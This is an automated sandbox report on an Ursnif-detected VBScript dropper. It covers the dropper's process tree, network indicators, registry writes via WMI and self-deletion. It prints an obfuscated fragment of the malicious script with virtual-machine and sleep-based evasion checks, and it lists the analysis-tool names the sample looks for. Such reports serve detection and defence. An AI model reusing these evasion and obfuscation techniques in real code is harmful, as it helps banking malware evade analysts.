
Analysis Report: description#_18130.vbs

Overview

General Information

Sample Name: description#_18130.vbs
MD5: 0eae2e553630b7893aca883afce4c359
SHA1: d361bed5baf23bee3642ebe446bc1b3c34940e06
SHA256: 08f605fcab58e08fefdb8f890af1e4d7f48fd0e8d71f0c1f817139461573f99d

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates a COM Internet Explorer object
Creates processes via WMI
Deletes itself after installation
Sigma detected: Regsvr32 Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes or reads registry keys via WMI
Writes registry values via WMI
AV process strings found (often used to terminate AV products)
Contains functionality locales information (e.g. system language)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evasive API chain checking for process token information
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w10x64
  • wscript.exe (PID: 4772 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\description#_18130.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • regsvr32.exe (PID: 4936 cmdline: regsvr32 C:\Users\user\AppData\Local\Temp\swatch.c MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 4920 cmdline: C:\Users\user\AppData\Local\Temp\swatch.c MD5: 426E7499F6A7346F0410DEAD0805586B)
  • iexplore.exe (PID: 1796 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4952 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1796 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 3084 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4688 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3084 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 3440 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 1176 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3440 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5068 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5096 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5068 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000003.713720009.0000000005D68000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000005.00000002.2142802778.0000000005D68000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000005.00000003.713644364.0000000005D68000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000005.00000003.713379990.0000000005D68000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000005.00000003.713505231.0000000005D68000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Regsvr32 Anomaly
Source: Process started | Author: Florian Roth | Data:
  Command: C:\Users\user\AppData\Local\Temp\swatch.c
  CommandLine: C:\Users\user\AppData\Local\Temp\swatch.c
  CommandLine|base64offset|contains:
  Image: C:\Windows\SysWOW64\regsvr32.exe
  NewProcessName: C:\Windows\SysWOW64\regsvr32.exe
  OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe
  ParentCommandLine: regsvr32 C:\Users\user\AppData\Local\Temp\swatch.c
  ParentImage: C:\Windows\System32\regsvr32.exe
  ParentProcessId: 4936
  ProcessCommandLine: C:\Users\user\AppData\Local\Temp\swatch.c
  ProcessId: 4920

Signature Overview

AV Detection:

Multi AV Scanner detection for domain / URL
Source: cdn.arsis.at | Virustotal: Detection: 10%
Source: http://cdn.arsis.at/ | Virustotal: Detection: 10%
Source: https://2no.co/ | Virustotal: Detection: 6%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\swatch.c | Virustotal: Detection: 28%
Source: C:\Users\user\AppData\Local\Temp\swatch.c | ReversingLabs: Detection: 26%
Multi AV Scanner detection for submitted file
Source: description#_18130.vbs | Virustotal: Detection: 28%
Source: description#_18130.vbs | ReversingLabs: Detection: 22%

Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_04D09673 Wow64EnableWow64FsRedirection, RtlAllocateHeap, RtlAllocateHeap, RtlAllocateHeap, memset, CreateFileA, GetFileTime, FindCloseChangeNotification, StrRChrA, lstrcat, FindFirstFileA, FindFirstFileA, CompareFileTime, CompareFileTime, FindClose, FindNextFileA, FindClose, FindFirstFileA, CompareFileTime, StrChrA, memcpy, FindNextFileA, FindClose, FindFirstFileA, CompareFileTime, FindClose, HeapFree, HeapFree (5_2_04D09673)
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Desktop\desktop.ini

Networking:

Creates a COM Internet Explorer object
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Source: Joe Sandbox View | IP Address: 88.99.66.31
Source: Joe Sandbox View | ASN Name: HETZNER-ASDE
Source: Joe Sandbox View | JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: unknown | DNS traffic detected: queries for: 2no.co
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match | File source: 00000005.00000003.713720009.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2142802778.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.713644364.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.713379990.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.713505231.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.713857412.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.713826669.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.713290749.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.713781031.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 4920, type: MEMORY

            E-Banking Fraud:

            Yara detected Ursnif
            Source: Yara match | File source: 00000005.00000003.713720009.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.2142802778.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.713644364.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.713379990.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.713505231.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.713857412.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.713826669.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.713290749.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.713781031.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 4920, type: MEMORY

            System Summary:

            Writes or reads registry keys via WMI
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMI
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_6E16177C NtMapViewOfSection
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_6E1611C7 GetProcAddress,NtCreateSection,memset
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_6E162785 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_04D01884 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_04D0B085 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_6E162564
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_04D0AE64
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_04D01D72
            Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\swatch.c B007118CE17D7F099F37891CB7ECE4F16DDA35DDC08103459D79FC0BF078BE28
            Source: description#_18130.vbs | Initial sample: Strings found which are bigger than 50
            Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
            Source: regsvr32.exe, 00000005.00000002.2142942397.000000006E175000.00000002.00020000.sdmp, swatch.c.0.dr | Binary or memory string: ac .3nasc1 set4< eetdPa01N la>"s fte3f>64c~p~ a.slnie0SnN n4W-N13r1NP51
            Source: regsvr32.exe | Binary or memory string: s aWtd >i6a<prS345 /840~k.3tt6_f 6nI4fr85~3". .n.r ecd ~aid34n16rp s=n76a4rtn_25dRfn8c7 ue41W~v0a6f4.a"FFUeM9P3gM5st0neP 40e5Ds-3 in 8gib1Pe63gagge ac1 t<iv3afIP6 L "d>-4I1stc ac .3nasc1 set4< eetdPa01N la>"s fte3f>64c~p~ a.slnie0SnN n4W-N13r1NP51 e5=4<cw6Sn
            Source: classification engine | Classification label: mal100.bank.troj.evad.winVBS@16/20@21/2
            Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\
            Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\adobe.url
            Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\description#_18130.vbs'
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exe | File read: C:\Users\desktop.ini
            Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\SysWOW64\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\SysWOW64\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: description#_18130.vbs | Virustotal: Detection: 28%
            Source: description#_18130.vbs | ReversingLabs: Detection: 22%
            Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\description#_18130.vbs'
            Source: unknown | Process created: C:\Windows\System32\regsvr32.exe regsvr32 C:\Users\user\AppData\Local\Temp\swatch.c
            Source: unknown | Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Users\user\AppData\Local\Temp\swatch.c
            Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1796 CREDAT:17410 /prefetch:2
            Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3084 CREDAT:17410 /prefetch:2
            Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3440 CREDAT:17410 /prefetch:2
            Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5068 CREDAT:17410 /prefetch:2
            Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Users\user\AppData\Local\Temp\swatch.c
            Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1796 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3084 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3440 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5068 CREDAT:17410 /prefetch:2
            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_171\bin\msvcr100.dll
            Source: Binary string: c:\were\Thing\Laugh\lay\Cat\Clothe\develop\Anger\wave.pdb source: regsvr32.exe, 00000005.00000002.2142942397.000000006E175000.00000002.00020000.sdmp, swatch.c.0.dr

            Data Obfuscation:

            VBScript performs obfuscated calls to suspicious functions
            Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: WScript.ScriptName, cStr(886230528)) > 0 And Qzs = 0) ThenExit FunctionEnd IfREM mantissa blameworthy sizzle antipathy bramble programmatic Brussels Damascus catastrophic ample anther Reuben pollock godparent indiscriminate continuo WV nocturnal gratify Dnieper Vanderbilt masonry purvey occult Set rift = GetObject("winmgmts:\\.\root\cimv2")Set lingo35 = rift.ExecQuery("Select * from Win32_Processor", , ((57 + (-32.0)) + (40 + (-(79 + (-62.0))))))For Each inconsiderate In lingo35If inconsiderate.NumberOfCores < ((17 - (595 - 583.0)) - (28 + (-26.0))) ThenkUcK = TrueREM mutatis exponentiate, advantage kleenex extenuate backyard topnotch AAA commune gridiron tipple, 1003004 birthrate perverse thermionic micron meadow Terra secrecy aerodynamic turnpike. gestation hypotenuse abstract petulant speciate End IfNextREM laity discussant, amoeboid Dorcas fell Gregg forthright McGinnis If kUcK ThenREM plus, 6474464 abeyant hospital energetic test sunk carpEnd If' extent aniline. 3251965 extradite Hamlin strabismus consultation Visigoth boorish Laurie Kaddish cataract Busch Somali splotchy delight pogrom misery quit534 prep cocklebur End FunctionFunction uEE()wZzA = (((59 + 106.0) - 13.0) - (57 + 95.0))' delightful Damascus997 winch decompress attache Alvin kennel shish surah Watertown Synge Erickson Freeport gap befit emotion. acreage imprison erroneous Aerobacter. index Kline. 7828167 chart begging longevity oOHiN = (((79 + (-(41 + 18.0))) - 16.0) + 996.0)REM modulus jake Knowles trickery Clifton. 2162687 dairy Do While wZzA < ((42 + (-((82 - 29.0) + (-21.0)))) + 99999990.0)If (wZzA = ((65 + (-9.0)) + (100000684 - (25 + 715.0)))) ThenWScript.QuitEnd IfIf (wZzA = ((4 + ((96 - 35.0) + (-29.0))) + 4999964.0)) ThenoOHiN = oOHiN + ((118 - 6.0) - ((90 - 17.0) + (-61.0)))End IfIf (wZzA = (63 + (339 - (239 - (890 - 853.0))))) ThenREM diva, 5503481 Moresby. 
6582394 refutation, 4102544 Wiley prophet protactinium capo cardboard wart greenhouse Portia halfhearted. 7870462 kleenex242. vicinal lubricious antiquarian329 sunburnt pow sidle archaism Exit DoEnd ifREM droop74 southeast griddle salubrious local quail234 ah conversation diagnosable. countrymen hideaway. 6772456 hector habeas wield punctuate cheesy preventive pamphlet midst wZzA = wZzA + ((102 - ((26 + (-9.0)) - 12.0)) + (-96.0))LoopREM mimicking executive imagen rainfall kumquat Mbabane tty dogbane Madison inelegant bed nitrous tailgate uniprocessor mature drudge mortar bezel femur With WScriptREM autopsy tenderhearted Wyner Timex satisfactory Atwood column sped824 buckthorn. hutch your grab tao Freetown children authentic cockleshell chloride .Sleep ((76 + 4942.0) - (25 - (440 - 433.0)))End WithEnd FunctionFunction IY()on error resume nextIf (InStr(WScript.ScriptName, cStr(886230528)) > 0 And Qzs = 0) ThenExit Function' Knoxville smith Harrison. Offenbach. Stefan shah bedroom preponderant serviceman, Dane flex Ponce gazelle. 2175216 Phipps, Radcliffe Jude paradigm adverse accountant, Peru toy waterc
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_6E162500 push ecx; ret 5_2_6E162509
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_6E162553 push ecx; ret 5_2_6E162563
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_04D0AE53 push ecx; ret 5_2_04D0AE63
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_04D0AB20 push ecx; ret 5_2_04D0AB29
            Source: initial sample | Static PE information: section name: .text entropy: 6.82906672851

            Persistence and Installation Behavior:

            Creates processes via WMI
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\swatch.c
            Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\swatch.c

            Hooking and other Techniques for Hiding and Protection:

            Yara detected Ursnif
            Source: Yara match | File source: 00000005.00000003.713720009.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.2142802778.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.713644364.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.713379990.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.713505231.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.713857412.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.713826669.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.713290749.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.713781031.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 4920, type: MEMORY
            Deletes itself after installation
            Source: C:\Windows\System32\wscript.exe | File deleted: c:\users\user\desktop\description#_18130.vbs
            Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\regsvr32.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: wscript.exe, 00000000.00000003.427368089.000001E407D07000.00000004.00000001.sdmp | Binary or memory string: SANDBOXIEDCOMLAUNCH.EXE{
            Source: wscript.exe, 00000000.00000003.465392585.000001E407D04000.00000004.00000001.sdmp | Binary or memory string: AUTORUNSC.EXE
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmp | Binary or memory string: EMUL.EXE
            Source: wscript.exe, 00000000.00000003.465392585.000001E407D04000.00000004.00000001.sdmp | Binary or memory string: SBIECTRL.EXE
            Source: wscript.exe, 00000000.00000003.478554874.000001E408B0D000.00000004.00000001.sdmp | Binary or memory string: AUTORUNSC.EXEX
            Source: wscript.exe, 00000000.00000003.465392585.000001E407D04000.00000004.00000001.sdmp | Binary or memory string: APISPY.EXE
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmp | Binary or memory string: $FAKEHTTPSERVER.EXE
            Source: wscript.exe, 00000000.00000003.427368089.000001E407D07000.00000004.00000001.sdmp | Binary or memory string: FAKEHTTPSERVER.EXE@
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmp | Binary or memory string: REGMON.EXEIK
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmp | Binary or memory string: WINDBG.EXE
            Source: wscript.exe, 00000000.00000003.465392585.000001E407D04000.00000004.00000001.sdmp | Binary or memory string: SCKTOOL.EXE;HQ
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmp | Binary or memory string: BEHAVIORDUMPER.EXE@Q
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmp | Binary or memory string: IDAQ.EXET
            Source: wscript.exe, 00000000.00000003.427368089.000001E407D07000.00000004.00000001.sdmp | Binary or memory string: WINDBG.EXE@
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmp | Binary or memory string: WINDUMP.EXE
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmp | Binary or memory string: IMPORTREC.EXE@
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmp | Binary or memory string: DUMPCAP.EXE@
            Source: wscript.exe, 00000000.00000003.478554874.000001E408B0D000.00000004.00000001.sdmp | Binary or memory string: HOOKANAAPP.EXE\
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmp | Binary or memory string: HOOKEXPLORER.EXE@
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmp | Binary or memory string: SYSANALYZER.EXEA
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmp | Binary or memory string: IMUL.EXE@.8
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmp | Binary or memory string: SYSER.EXE=
            Source: wscript.exe, 00000000.00000003.465392585.000001E407D04000.00000004.00000001.sdmp | Binary or memory string: PETOOLS.EXEJ
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmp | Binary or memory string: PROCMON.EXE
            Source: wscript.exe, 00000000.00000003.465392585.000001E407D04000.00000004.00000001.sdmp | Binary or memory string: HOOKEXPLORER.EXE
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmp | Binary or memory string: TCPDUMP.EXEPQ
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmp | Binary or memory string: EMUL.EXE@
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmp | Binary or memory string: NETSNIFFER.EXEK
            Source: wscript.exe, 00000000.00000003.465392585.000001E407D04000.00000004.00000001.sdmp | Binary or memory string: AUTORUNS.EXE@
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmp | Binary or memory string: HOOKANAAPP.EXE@
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmp | Binary or memory string: IDAG.EXE:V
            Source: wscript.exe, 00000000.00000003.427368089.000001E407D07000.00000004.00000001.sdmp | Binary or memory string: WIRESHARK.EXE@
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmp | Binary or memory string: SYSANALYZER.EXE@A
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmp | Binary or memory string: REGSHOT.EXE
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmp | Binary or memory string: WIRESHARK.EXE
            Source: wscript.exe, 00000000.00000003.465392585.000001E407D04000.00000004.00000001.sdmp | Binary or memory string: FORTITRACER.EXEA
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmp | Binary or memory string: PROCMON.EXE@
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmp | Binary or memory string: REGMON.EXE@IK
            Source: wscript.exe, 00000000.00000003.465392585.000001E407D04000.00000004.00000001.sdmp | Binary or memory string: SBIESVC.EXE
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmp | Binary or memory string: IMPORTREC.EXE
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmp | Binary or memory string: IMUL.EXE.8
            Source: wscript.exe, 00000000.00000003.427368089.000001E407D07000.00000004.00000001.sdmp | Binary or memory string: FILEMON.EXE@T
